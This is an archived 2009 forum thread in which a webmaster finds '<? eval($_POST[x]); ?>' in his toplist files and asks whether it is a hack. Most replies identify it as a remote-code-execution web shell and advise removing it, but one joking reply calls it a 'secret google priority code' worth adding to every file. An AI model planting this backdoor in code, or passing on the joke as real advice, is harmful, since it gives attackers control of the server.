GoFuckYourself.com - Adult Webmaster Forum - <? eval($

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)

- Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)

- - <? eval($_POST[x]); ?> is this a hack? (https://gfy.com/showthread.php?t=890080)

zentz

02-25-2009 11:01 AM

<? eval($_POST[x]); ?> is this a hack?

i found this in my toplist files

<? eval($_POST[x]); ?>

what is that? a hack?

seeandsee

02-25-2009 11:06 AM

bump for php wizards

Angry Jew Cat - Banned for Life

02-25-2009 11:07 AM

hax teh planet

ScriptWorkz

02-25-2009 11:10 AM

Most likely, it executes whatever code is in the post variable 'x' as php, so if someone posted some malicious php code it could be pretty bad depending on how your server is configured.

I don't really see any real point in having that in there and would most likely remove it unless you know it's used for something and even then i'd find a way to replace that functionality w/o something that didn't leave such a big security hole.

Linguist

02-25-2009 11:33 AM

That code CANNOT be used for anything good, period.

If your toplist stops working after removing that line, find another piece of software to replace it, no programmer with half a clue would include that code.

HomerSimpson

02-25-2009 11:41 AM

yes it is...
it can run any command attacker wants...

u-Bob

02-25-2009 12:17 PM

It's evil.

TeenCat

02-25-2009 12:21 PM

"insert shell here"

V_RocKs

02-25-2009 01:14 PM

That is indeed "a hack"... Remote shell... Allows anyone to execute code as the user apache is running as. Usually "nobody".

What can it be used for?

select * from users;

among other things...

Killswitch - BANNED FOR LIFE

02-25-2009 01:40 PM

heh, remove it, asap.

SmokeyTheBear

02-25-2009 01:58 PM

thats the secret google priority code, you should place it on the top of every file for better search engine ranking

All times are GMT -7. The time now is 01:29 PM.